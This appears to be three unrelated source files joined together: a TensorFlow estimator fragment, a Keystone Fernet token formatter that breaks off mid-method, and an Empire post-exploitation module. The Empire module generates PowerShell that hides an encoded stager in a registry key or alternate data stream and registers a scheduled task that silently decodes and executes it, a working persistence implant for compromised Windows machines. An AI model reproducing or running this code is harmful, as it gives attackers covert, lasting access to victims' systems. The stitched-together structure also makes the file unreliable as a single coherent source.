      preds = preds
    return preds

  def predict(self, x, axis=1, batch_size=None):
    """Predict class or regression for X.

    For a classification model, the predicted class for each sample in X is
    returned. For a regression model, the predicted value based on X is
    returned.

    Args:
      x: array-like matrix, [n_samples, n_features...] or iterator.
      axis: Which axis to argmax for classification.
        By default axis 1 (next after batch) is used.
        Use 2 for sequence predictions.
      batch_size: If test set is too big, use batch size to split
        it into mini batches. By default the batch_size member
        variable is used.

    Returns:
      y: array of shape [n_samples]. The predicted classes or predicted
        value.
    """
    return self._predict(x, axis=axis, batch_size=batch_size)

  def predict_proba(self, x, batch_size=None):
    """Predict class probability of the input samples X.

    Args:
      x: array-like matrix, [n_samples, n_features...] or iterator.
      batch_size: If test set is too big, use batch size to split
        it into mini batches. By default the batch_size member variable is used.

    Returns:
      y: array of shape [n_samples, n_classes]. The predicted
        probabilities for each class.
    """
    # axis defaults to -1 in _predict, so no argmax is applied here.
    return self._predict(x, batch_size=batch_size)

  def get_tensor(self, name):
    """Returns tensor by name.

    Args:
      name: string, name of the tensor.

    Returns:
      Tensor.
    """
    return self._graph.get_tensor_by_name(name)

  def get_tensor_value(self, name):
    """Returns value of the tensor give by name.

    Args:
      name: string, name of the tensor.

    Returns:
      Numpy array - value of the tensor.
    """
    # Checkpoint variable names do not carry the ':0' output suffix.
    if name.endswith(':0'):
      name = name[:-2]
    return checkpoints.load_variable(self.model_dir, name)

  def get_variable_names(self):
    """Returns list of all variable names in this model.

    Returns:
      List of names.
    """
    return [name for name, _ in checkpoints.list_variables(self.model_dir)]

  def save(self, path):
    """Saves checkpoints and graph to given path.

    Args:
      path: Folder to save model to.
    """
    if self._graph is None:
      raise NotFittedError
    # Copy model dir into new path.
    _copy_dir(self.model_dir, path)
    # Save model definition: keep only serializable, non-callable params.
    all_params = self.get_params()
    params = {}
    for key, value in all_params.items():
      if not callable(value) and value is not None:
        params[key] = value
    params['class_name'] = type(self).__name__
    model_def = json.dumps(
        params,
        default=lambda o: o.__dict__ if hasattr(o, '__dict__') else None)
    _write_with_backup(os.path.join(path, 'model.def'), model_def)

  def _restore(self, path):
    """Restores this estimator from given path.

    Note: will rebuild the graph and initialize all parameters,
    and will ignore provided model.

    Args:
      path: Path to checkpoints and other information.
    """
    raise NotImplementedError

  # pylint: disable=unused-argument
  @classmethod
  def restore(cls, path, config=None):
    """Restores model from give path.

    Args:
      path: Path to the checkpoints and other model information.
      config: RunConfig object that controls the configurations of the session,
        e.g. num_cores, gpu_memory_fraction, etc. This is allowed to be
        reconfigured.

    Returns:
      Estimator, object of the subclass of TensorFlowEstimator.
    """
    model_def_filename = os.path.join(path, 'model.def')
    if not os.path.exists(model_def_filename):
      raise ValueError("Restore folder doesn't contain model definition.")
    # list of parameters that are allowed to be reconfigured
    reconfigurable_params = ['_config']
    _config = config
    with gfile.Open(model_def_filename) as fmodel:
      model_def = json.loads(fmodel.read())
      # TensorFlow binding requires parameters to be strings not unicode.
      # Only issue in Python2.
      for key, value in model_def.items():
        if isinstance(value, string_types) and not isinstance(value, str):
          model_def[key] = str(value)
        if key in reconfigurable_params:
          # NOTE(review): relies on locals() to map the saved key '_config'
          # to the local variable of the same name above.
          new_value = locals()[key]
          if new_value is not None:
            model_def[key] = new_value
    class_name = model_def.pop('class_name')
    if class_name == 'TensorFlowEstimator':
      custom_estimator = TensorFlowEstimator(model_fn=None, **model_def)
      custom_estimator._restore(path)
      return custom_estimator
    # To avoid cyclical dependencies, import inside the function instead of
    # the beginning of the file.
    from tensorflow.contrib.learn.python.learn import estimators
    # Estimator must be one of the defined estimators in the __init__ file.
    estimator = getattr(estimators, class_name)(**model_def)
    estimator._restore(path)
    return estimator
class TensorFlowBaseTransformer(TensorFlowEstimator, _sklearn.TransformerMixin):
  """TensorFlow Base Transformer class.

  Adds the scikit-learn transformer interface (transform / fit /
  fit_transform) on top of TensorFlowEstimator.
  """

  def transform(self, X):
    """Transform X using trained transformer."""
    return super(TensorFlowBaseTransformer, self).predict(
        X, axis=1, batch_size=None)

  def fit(self, X, y=None, monitor=None, logdir=None):
    """Fit a transformer.

    Args:
      X: training input samples.
      y: optional training targets.
      monitor: optional list of `BaseMonitor` objects, forwarded to the
        estimator's `monitors` argument.
      logdir: optional directory for logs/visualization.

    Returns:
      Returns self.
    """
    # Bug fix: previously `monitor` and `logdir` were silently discarded
    # (hardcoded to None); forward the caller-supplied values instead.
    return super(TensorFlowBaseTransformer, self).fit(
        X, y, monitors=monitor, logdir=logdir)

  def fit_transform(self, X, y=None, monitor=None, logdir=None):
    """Fit transformer and transform X using trained transformer."""
    # Same fix: propagate monitor/logdir through to fit().
    return self.fit(X, y, monitor=monitor, logdir=logdir).transform(X)
| |
import os
from lib.common import helpers
class Module:
    """Empire module: persist a stager or script via a Windows scheduled task.

    Builds a PowerShell script that stores an encoded payload (registry key
    or NTFS alternate data stream) and registers a schtasks trigger to run it.
    """

    def __init__(self, mainMenu, params=[]):
        # NOTE(review): mutable default argument `params=[]` is the existing
        # framework convention; it is only iterated here, never mutated.
        # Metadata describing this module to the Empire framework.
        self.info = {
            'Name': 'Invoke-Schtasks',
            'Author': ['@mattifestation', '@harmj0y'],
            'Description': ('Persist a stager (or script) using schtasks. This has a moderate detection/removal rating.'),
            'Background' : False,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : False,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
            ]
        }
        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            },
            'Listener' : {
                'Description' : 'Listener to use.',
                'Required' : False,
                'Value' : ''
            },
            'DailyTime' : {
                'Description' : 'Daily time to trigger the script (HH:mm).',
                'Required' : False,
                'Value' : '09:00'
            },
            'IdleTime' : {
                'Description' : 'User idle time (in minutes) to trigger script.',
                'Required' : False,
                'Value' : ''
            },
            'TaskName' : {
                'Description' : 'Name to use for the schtask.',
                'Required' : True,
                'Value' : 'Updater'
            },
            'RegPath' : {
                'Description' : 'Registry location to store the script code. Last element is the key name.',
                'Required' : False,
                'Value' : 'HKCU:\Software\Microsoft\Windows\CurrentVersion\debug'
            },
            'ADSPath' : {
                'Description' : 'Alternate-data-stream location to store the script code.',
                'Required' : False,
                'Value' : ''
            },
            'ExtFile' : {
                'Description' : 'Use an external file for the payload instead of a stager.',
                'Required' : False,
                'Value' : ''
            },
            'Cleanup' : {
                'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
                'Required' : False,
                'Value' : ''
            },
            'UserAgent' : {
                'Description' : 'User-agent string to use for the staging request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            },
            'Proxy' : {
                'Description' : 'Proxy to use for request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            },
            'ProxyCreds' : {
                'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):
        """Build and return the PowerShell persistence (or cleanup) script.

        Returns the script text on success, or "" when validation fails.
        """
        listenerName = self.options['Listener']['Value']

        # trigger options
        dailyTime = self.options['DailyTime']['Value']
        idleTime = self.options['IdleTime']['Value']
        taskName = self.options['TaskName']['Value']

        # storage options
        regPath = self.options['RegPath']['Value']
        adsPath = self.options['ADSPath']['Value']

        # management options
        extFile = self.options['ExtFile']['Value']
        cleanup = self.options['Cleanup']['Value']

        # staging options
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']

        statusMsg = ""
        locationString = ""

        # for cleanup, remove any script from the specified storage location
        # and remove the specified trigger
        if cleanup.lower() == 'true':
            if adsPath != '':
                # remove the ADS storage location
                if ".txt" not in adsPath:
                    print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
                    return ""
                # overwrite the stream with a single byte to wipe the payload
                script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
            else:
                # remove the script stored in the registry at the specified reg path
                path = "\\".join(regPath.split("\\")[0:-1])
                name = regPath.split("\\")[-1]
                script = "$RegPath = '"+regPath+"';"
                script += "$parts = $RegPath.split('\\');"
                script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
                script += "$name = $parts[-1];"
                script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
            script += "schtasks /Delete /F /TN "+taskName+";"
            script += "'Schtasks persistence removed.'"
            return script

        if extFile != '':
            # read in an external file as the payload and build a
            # base64 encoded version as encScript
            if os.path.exists(extFile):
                f = open(extFile, 'r')
                fileData = f.read()
                f.close()
                # unicode-base64 encode the script for -enc launching
                encScript = helpers.enc_powershell(fileData)
                statusMsg += "using external file " + extFile
            else:
                print helpers.color("[!] File does not exist: " + extFile)
                return ""
        else:
            # if an external file isn't specified, use a listener
            if not self.mainMenu.listeners.is_listener_valid(listenerName):
                # not a valid listener, return nothing for the script
                print helpers.color("[!] Invalid listener: " + listenerName)
                return ""
            else:
                # generate the PowerShell one-liner with all of the proper options set
                launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
                # keep only the -enc base64 blob from the generated launcher
                encScript = launcher.split(" ")[-1]
                statusMsg += "using listener " + listenerName

        if adsPath != '':
            # store the script in the specified alternate data stream location
            if ".txt" not in adsPath:
                print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
                return ""
            script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
            locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
        else:
            # otherwise store the script into the specified registry location
            path = "\\".join(regPath.split("\\")[0:-1])
            name = regPath.split("\\")[-1]
            statusMsg += " stored in " + regPath
            script = "$RegPath = '"+regPath+"';"
            script += "$parts = $RegPath.split('\\');"
            script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
            script += "$name = $parts[-1];"
            script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
            # note where the script is stored
            locationString = "(gp "+path+" "+name+")."+name

        # built the command that will be triggered by the schtask
        triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"

        # sanity check to make sure we haven't exceeded the cmd.exe command length max
        if len(triggerCmd) > 259:
            print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
            return ""

        if idleTime != '':
            script += "schtasks /Create /F /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
            statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
        else:
            # otherwise assume we're doing a daily trigger
            script += "schtasks /Create /F /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
            statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."

        script += "'Schtasks persistence established "+statusMsg+"'"
        return script
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import datetime
import struct
import uuid
from cryptography import fernet
import msgpack
from oslo_log import log
from oslo_utils import timeutils
from keystone.auth import plugins as auth_plugins
from keystone.common import fernet_utils as utils
from keystone.common import utils as ks_utils
import keystone.conf
from keystone import exception
from keystone.i18n import _
CONF = keystone.conf.CONF
LOG = log.getLogger(__name__)

# Fernet byte indexes as computed by pypi/keyless_fernet and defined in
# https://github.com/fernet/spec
# Byte 0 is the format version; bytes 1-8 hold the big-endian creation
# timestamp (see TokenFormatter.creation_time).
TIMESTAMP_START = 1
TIMESTAMP_END = 9
class TokenFormatter(object):
    """Packs and unpacks payloads into tokens for transport."""

    @property
    def crypto(self):
        """Return a cryptography instance.

        You can extend this class with a custom crypto @property to provide
        your own token encoding / decoding. For example, using a different
        cryptography library (e.g. ``python-keyczar``) or to meet arbitrary
        security requirements.

        This @property just needs to return an object that implements
        ``encrypt(plaintext)`` and ``decrypt(ciphertext)``.
        """
        fernet_utils = utils.FernetUtils(
            CONF.fernet_tokens.key_repository,
            CONF.fernet_tokens.max_active_keys,
            'fernet_tokens'
        )
        keys = fernet_utils.load_keys()
        if not keys:
            raise exception.KeysNotFound()
        # MultiFernet encrypts with the first key but can decrypt with any
        # key in the list, which is what enables key rotation.
        fernet_instances = [fernet.Fernet(key) for key in keys]
        return fernet.MultiFernet(fernet_instances)

    def pack(self, payload):
        """Pack a payload for transport as a token.

        :type payload: bytes
        :rtype: str
        """
        # base64 padding (if any) is not URL-safe
        return self.crypto.encrypt(payload).rstrip(b'=').decode('utf-8')

    def unpack(self, token):
        """Unpack a token, and validate the payload.

        :type token: str
        :rtype: bytes
        """
        token = TokenFormatter.restore_padding(token)
        try:
            return self.crypto.decrypt(token.encode('utf-8'))
        except fernet.InvalidToken:
            raise exception.ValidationError(
                _('Could not recognize Fernet token'))

    @classmethod
    def restore_padding(cls, token):
        """Restore padding based on token size.

        :param token: token to restore padding on
        :type token: str
        :returns: token with correct padding
        """
        # Re-inflate the padding
        mod_returned = len(token) % 4
        if mod_returned:
            missing_padding = 4 - mod_returned
            token += '=' * missing_padding
        return token

    @classmethod
    def creation_time(cls, fernet_token):
        """Return the creation time of a valid Fernet token.

        :type fernet_token: str
        """
        fernet_token = TokenFormatter.restore_padding(fernet_token)
        # fernet_token is str
        # Fernet tokens are base64 encoded, so we need to unpack them first
        # urlsafe_b64decode() requires bytes
        token_bytes = base64.urlsafe_b64decode(fernet_token.encode('utf-8'))
        # slice into the byte array to get just the timestamp
        timestamp_bytes = token_bytes[TIMESTAMP_START:TIMESTAMP_END]
        # convert those bytes to an integer
        # (it's a 64-bit "unsigned long long int" in C)
        timestamp_int = struct.unpack(">Q", timestamp_bytes)[0]
        # and with an integer, it's trivial to produce a datetime object
        issued_at = datetime.datetime.utcfromtimestamp(timestamp_int)
        return issued_at

    def create_token(self, user_id, expires_at, audit_ids, payload_class,
                     methods=None, system=None, domain_id=None,
                     project_id=None, trust_id=None, federated_group_ids=None,
                     identity_provider_id=None, protocol_id=None,
                     access_token_id=None, app_cred_id=None):
        """Given a set of payload attributes, generate a Fernet token."""
        # Prefix the msgpack'd payload with its version so validate_token()
        # can dispatch to the right payload class.
        version = payload_class.version
        payload = payload_class.assemble(
            user_id, methods, system, project_id, domain_id, expires_at,
            audit_ids, trust_id, federated_group_ids, identity_provider_id,
            protocol_id, access_token_id, app_cred_id
        )
        versioned_payload = (version,) + payload
        serialized_payload = msgpack.packb(versioned_payload)
        token = self.pack(serialized_payload)
        # NOTE(lbragstad): We should warn against Fernet tokens that are over
        # 255 characters in length. This is mostly due to persisting the tokens
        # in a backend store of some kind that might have a limit of 255
        # characters. Even though Keystone isn't storing a Fernet token
        # anywhere, we can't say it isn't being stored somewhere else with
        # those kind of backend constraints.
        if len(token) > 255:
            LOG.info('Fernet token created with length of %d '
                     'characters, which exceeds 255 characters',
                     len(token))
        return token

    def validate_token(self, token):
        """Validate a Fernet token and returns the payload attributes.

        :type token: str
        """
        serialized_payload = self.unpack(token)
        # TODO(melwitt): msgpack changed their data format in version 1.0, so
        # in order to support a rolling upgrade, we must pass raw=True to
        # support the old format. The try-except may be removed once the
        # N-1 release no longer supports msgpack < 1.0.
        try:
            versioned_payload = msgpack.unpackb(serialized_payload)
        except UnicodeDecodeError:
            versioned_payload = msgpack.unpackb(serialized_payload, raw=True)
        version, payload = versioned_payload[0], versioned_payload[1:]
        # NOTE(review): _PAYLOAD_CLASSES is expected to be defined elsewhere
        # in this module (not visible in this chunk).
        for payload_class in _PAYLOAD_CLASSES:
            if version == payload_class.version:
                (user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id) = payload_class.disassemble(payload)
                break
        else:
            # If the token_format is not recognized, raise ValidationError.
            raise exception.ValidationError(_(
                'This is not a recognized Fernet payload version: %s') %
                version)
        # FIXME(lbragstad): Without this, certain token validation tests fail
        # when running with python 3. Once we get further along in this
        # refactor, we should be better about handling string encoding/types at
        # the edges of the application.
        if isinstance(system, bytes):
            system = system.decode('utf-8')
        # rather than appearing in the payload, the creation time is encoded
        # into the token format itself
        issued_at = TokenFormatter.creation_time(token)
        issued_at = ks_utils.isotime(at=issued_at, subsecond=True)
        expires_at = timeutils.parse_isotime(expires_at)
        expires_at = ks_utils.isotime(at=expires_at, subsecond=True)
        return (user_id, methods, audit_ids, system, domain_id, project_id,
                trust_id, federated_group_ids, identity_provider_id,
                protocol_id, access_token_id, app_cred_id, issued_at,
                expires_at)
class BasePayload(object):
    """Common (de)serialization helpers shared by all payload versions."""

    # Each payload variant must declare a unique version number.
    version = None

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        """Assemble the payload of a token.

        :param user_id: identifier of the user in the token request
        :param methods: list of authentication methods used
        :param system: a string including system scope information
        :param project_id: ID of the project to scope to
        :param domain_id: ID of the domain to scope to
        :param expires_at: datetime of the token's expiration
        :param audit_ids: list of the token's audit IDs
        :param trust_id: ID of the trust in effect
        :param federated_group_ids: list of group IDs from SAML assertion
        :param identity_provider_id: ID of the user's identity provider
        :param protocol_id: federated protocol used for authentication
        :param access_token_id: ID of the secret in OAuth1 authentication
        :param app_cred_id: ID of the application credential in effect
        :returns: the payload of a token
        """
        raise NotImplementedError()

    @classmethod
    def disassemble(cls, payload):
        """Break a payload back into its component fields.

        The resulting tuple is::

            (user_id, methods, system, project_id, domain_id,
             expires_at_str, audit_ids, trust_id, federated_group_ids,
             identity_provider_id, protocol_id, access_token_id, app_cred_id)

        Fields that do not apply to a given payload type are set to None.

        :param payload: this variant of payload
        :returns: a tuple of the payload's component data
        """
        raise NotImplementedError()

    @classmethod
    def convert_uuid_hex_to_bytes(cls, uuid_string):
        """Compress a UUID-formatted string into its 16 raw bytes.

        :param uuid_string: uuid string to compress to bytes
        :returns: a byte representation of the uuid
        """
        return uuid.UUID(uuid_string).bytes

    @classmethod
    def convert_uuid_bytes_to_hex(cls, uuid_byte_string):
        """Expand 16 raw UUID bytes back into uuid.hex form.

        :param uuid_byte_string: uuid string to generate from
        :returns: uuid hex formatted string
        """
        return uuid.UUID(bytes=uuid_byte_string).hex

    @classmethod
    def _convert_time_string_to_float(cls, time_string):
        """Convert an ISO8601 time string to a POSIX timestamp (float)."""
        epoch = datetime.datetime.utcfromtimestamp(0)
        parsed = timeutils.normalize_time(timeutils.parse_isotime(time_string))
        return (parsed - epoch).total_seconds()

    @classmethod
    def _convert_float_to_time_string(cls, time_float):
        """Convert a POSIX timestamp back into an ISO8601 time string."""
        moment = datetime.datetime.utcfromtimestamp(time_float)
        return ks_utils.isotime(moment, subsecond=True)

    @classmethod
    def attempt_convert_uuid_hex_to_bytes(cls, value):
        """Try to compress a value to UUID bytes, else return it untouched.

        :param value: value to attempt to convert to bytes
        :returns: (True, <bytes>) when the value was a UUID string, or
            (False, <original value>) when it could not be converted
        """
        try:
            converted = cls.convert_uuid_hex_to_bytes(value)
        except (ValueError, TypeError):
            # ValueError: not a UUID at all (e.g. federated user IDs).
            # TypeError: value was already binary encoded (Python 3);
            # in either case hand the original value back unchanged.
            return (False, value)
        return (True, converted)

    @classmethod
    def base64_encode(cls, s):
        """URL-safe base64 encode with the trailing '=' padding stripped.

        :type s: str
        :rtype: str
        """
        encoded = base64.urlsafe_b64encode(s)
        return encoded.decode('utf-8').rstrip('=')

    @classmethod
    def random_urlsafe_str_to_bytes(cls, s):
        """Convert string from :func:`random_urlsafe_str()` to bytes.

        :type s: str
        :rtype: bytes
        """
        # urlsafe_b64decode() wants str input; put back the '==' padding
        # that random_urlsafe_str() stripped when it generated the value.
        return base64.urlsafe_b64decode(str(s) + '==')

    @classmethod
    def _convert_or_decode(cls, is_stored_as_bytes, value):
        """Return value as text, expanding uuid bytes to hex when flagged.

        :param is_stored_as_bytes: whether value is compressed uuid bytes
        :type is_stored_as_bytes: boolean
        :param value: value to convert
        :type value: str or bytes
        :rtype: str
        """
        if is_stored_as_bytes:
            return cls.convert_uuid_bytes_to_hex(value)
        if isinstance(value, bytes):
            return value.decode('utf-8')
        return value
class UnscopedPayload(BasePayload):
    """Payload for tokens that carry no scope at all."""

    version = 0

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        packed_user = cls.attempt_convert_uuid_hex_to_bytes(user_id)
        method_int = auth_plugins.convert_method_list_to_integer(methods)
        expiry = cls._convert_time_string_to_float(expires_at)
        packed_audits = [cls.random_urlsafe_str_to_bytes(audit_id)
                         for audit_id in audit_ids]
        return (packed_user, method_int, expiry, packed_audits)

    @classmethod
    def disassemble(cls, payload):
        is_stored_as_bytes, raw_user = payload[0]
        user_id = cls._convert_or_decode(is_stored_as_bytes, raw_user)
        methods = auth_plugins.convert_integer_to_method_list(payload[1])
        expires_at_str = cls._convert_float_to_time_string(payload[2])
        audit_ids = [cls.base64_encode(audit_id) for audit_id in payload[3]]
        # Unscoped tokens carry no scope, federation, or delegation data:
        # system/project/domain/trust/federated/idp/protocol/access-token/
        # app-cred slots are all None.
        return (user_id, methods, None, None, None,
                expires_at_str, audit_ids, None, None,
                None, None, None, None)
class DomainScopedPayload(BasePayload):
    """Payload for tokens scoped to a single domain."""

    version = 1

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        packed_user = cls.attempt_convert_uuid_hex_to_bytes(user_id)
        method_int = auth_plugins.convert_method_list_to_integer(methods)
        try:
            packed_domain = cls.convert_uuid_hex_to_bytes(domain_id)
        except ValueError:
            # The default domain ID is configurable and need not be a UUID;
            # only that one value may travel uncompressed.
            if domain_id != CONF.identity.default_domain_id:
                raise
            packed_domain = domain_id
        expiry = cls._convert_time_string_to_float(expires_at)
        packed_audits = [cls.random_urlsafe_str_to_bytes(audit_id)
                         for audit_id in audit_ids]
        return (packed_user, method_int, packed_domain, expiry,
                packed_audits)

    @classmethod
    def disassemble(cls, payload):
        is_stored_as_bytes, raw_user = payload[0]
        user_id = cls._convert_or_decode(is_stored_as_bytes, raw_user)
        methods = auth_plugins.convert_integer_to_method_list(payload[1])
        try:
            domain_id = cls.convert_uuid_bytes_to_hex(payload[2])
        except ValueError:
            # Mirror assemble(): only the (possibly non-UUID) default
            # domain ID is acceptable in uncompressed form.
            if isinstance(payload[2], bytes):
                payload[2] = payload[2].decode('utf-8')
            if payload[2] != CONF.identity.default_domain_id:
                raise
            domain_id = payload[2]
        expires_at_str = cls._convert_float_to_time_string(payload[3])
        audit_ids = [cls.base64_encode(audit_id) for audit_id in payload[4]]
        # Everything except the domain scope is None for this variant.
        return (user_id, methods, None, None, domain_id,
                expires_at_str, audit_ids, None, None,
                None, None, None, None)
class ProjectScopedPayload(BasePayload):
    """Payload for tokens scoped to a single project."""

    version = 2

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        packed_user = cls.attempt_convert_uuid_hex_to_bytes(user_id)
        method_int = auth_plugins.convert_method_list_to_integer(methods)
        packed_project = cls.attempt_convert_uuid_hex_to_bytes(project_id)
        expiry = cls._convert_time_string_to_float(expires_at)
        packed_audits = [cls.random_urlsafe_str_to_bytes(audit_id)
                         for audit_id in audit_ids]
        return (packed_user, method_int, packed_project, expiry,
                packed_audits)

    @classmethod
    def disassemble(cls, payload):
        is_stored_as_bytes, raw_user = payload[0]
        user_id = cls._convert_or_decode(is_stored_as_bytes, raw_user)
        methods = auth_plugins.convert_integer_to_method_list(payload[1])
        is_stored_as_bytes, raw_project = payload[2]
        project_id = cls._convert_or_decode(is_stored_as_bytes, raw_project)
        expires_at_str = cls._convert_float_to_time_string(payload[3])
        audit_ids = [cls.base64_encode(audit_id) for audit_id in payload[4]]
        # Everything except the project scope is None for this variant.
        return (user_id, methods, None, project_id, None,
                expires_at_str, audit_ids, None, None,
                None, None, None, None)
class TrustScopedPayload(BasePayload):
    """Payload for project-scoped tokens issued under a trust agreement."""

    version = 3

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        packed_user = cls.attempt_convert_uuid_hex_to_bytes(user_id)
        method_int = auth_plugins.convert_method_list_to_integer(methods)
        packed_project = cls.attempt_convert_uuid_hex_to_bytes(project_id)
        # Trust IDs are always UUIDs, so the strict conversion is used here.
        packed_trust = cls.convert_uuid_hex_to_bytes(trust_id)
        expiry = cls._convert_time_string_to_float(expires_at)
        packed_audits = [cls.random_urlsafe_str_to_bytes(audit_id)
                         for audit_id in audit_ids]
        return (packed_user, method_int, packed_project, expiry,
                packed_audits, packed_trust)

    @classmethod
    def disassemble(cls, payload):
        is_stored_as_bytes, raw_user = payload[0]
        user_id = cls._convert_or_decode(is_stored_as_bytes, raw_user)
        methods = auth_plugins.convert_integer_to_method_list(payload[1])
        is_stored_as_bytes, raw_project = payload[2]
        project_id = cls._convert_or_decode(is_stored_as_bytes, raw_project)
        expires_at_str = cls._convert_float_to_time_string(payload[3])
        audit_ids = [cls.base64_encode(audit_id) for audit_id in payload[4]]
        trust_id = cls.convert_uuid_bytes_to_hex(payload[5])
        # Project and trust are the only populated scope fields here.
        return (user_id, methods, None, project_id, None,
                expires_at_str, audit_ids, trust_id, None,
                None, None, None, None)
class FederatedUnscopedPayload(BasePayload):
    """Payload layout for unscoped federated tokens (version 4)."""

    version = 4

    @classmethod
    def pack_group_id(cls, group_dict):
        """Compress a single ``{'id': ...}`` group reference."""
        return cls.attempt_convert_uuid_hex_to_bytes(group_dict['id'])

    @classmethod
    def unpack_group_id(cls, group_id_in_bytes):
        """Expand a packed group reference back into ``{'id': ...}``."""
        stored_as_bytes, raw_group = group_id_in_bytes
        return {'id': cls._convert_or_decode(stored_as_bytes, raw_group)}

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        """Pack the federation-relevant attributes into a tuple."""
        packed_user = cls.attempt_convert_uuid_hex_to_bytes(user_id)
        method_int = auth_plugins.convert_method_list_to_integer(methods)
        packed_groups = [cls.pack_group_id(g) for g in federated_group_ids]
        packed_idp = cls.attempt_convert_uuid_hex_to_bytes(
            identity_provider_id)
        expiry = cls._convert_time_string_to_float(expires_at)
        packed_audit = [cls.random_urlsafe_str_to_bytes(a)
                        for a in audit_ids]
        return (packed_user, method_int, packed_groups, packed_idp,
                protocol_id, expiry, packed_audit)

    @classmethod
    def disassemble(cls, payload):
        """Unpack an unscoped federated payload into the 13-field tuple."""
        stored_as_bytes, raw_user = payload[0]
        user_id = cls._convert_or_decode(stored_as_bytes, raw_user)
        methods = auth_plugins.convert_integer_to_method_list(payload[1])
        group_ids = [cls.unpack_group_id(g) for g in payload[2]]
        stored_as_bytes, raw_idp = payload[3]
        idp_id = cls._convert_or_decode(stored_as_bytes, raw_idp)
        protocol_id = payload[4]
        if isinstance(protocol_id, bytes):
            protocol_id = protocol_id.decode('utf-8')
        expires_at_str = cls._convert_float_to_time_string(payload[5])
        audit_ids = [cls.base64_encode(b) for b in payload[6]]
        # Unscoped federated tokens carry no scope, trust, oauth or
        # app-cred data.
        return (user_id, methods, None, None, None, expires_at_str,
                audit_ids, None, group_ids, idp_id, protocol_id, None,
                None)
class FederatedScopedPayload(FederatedUnscopedPayload):
    """Shared layout for project- and domain-scoped federated tokens.

    Concrete subclasses set ``version``; at disassemble time that
    version decides whether the packed scope id is a project id or a
    domain id.
    """

    version = None

    @classmethod
    def assemble(cls, user_id, methods, system, project_id, domain_id,
                 expires_at, audit_ids, trust_id, federated_group_ids,
                 identity_provider_id, protocol_id, access_token_id,
                 app_cred_id):
        """Pack the scoped-federation attributes into a tuple."""
        packed_user = cls.attempt_convert_uuid_hex_to_bytes(user_id)
        method_int = auth_plugins.convert_method_list_to_integer(methods)
        # One slot holds whichever scope id is present.
        packed_scope = cls.attempt_convert_uuid_hex_to_bytes(
            project_id or domain_id)
        packed_groups = [cls.pack_group_id(g) for g in federated_group_ids]
        packed_idp = cls.attempt_convert_uuid_hex_to_bytes(
            identity_provider_id)
        expiry = cls._convert_time_string_to_float(expires_at)
        packed_audit = [cls.random_urlsafe_str_to_bytes(a)
                        for a in audit_ids]
        return (packed_user, method_int, packed_scope, packed_groups,
                packed_idp, protocol_id, expiry, packed_audit)

    @classmethod
    def disassemble(cls, payload):
        """Unpack a scoped federated payload into the 13-field tuple."""
        stored_as_bytes, raw_user = payload[0]
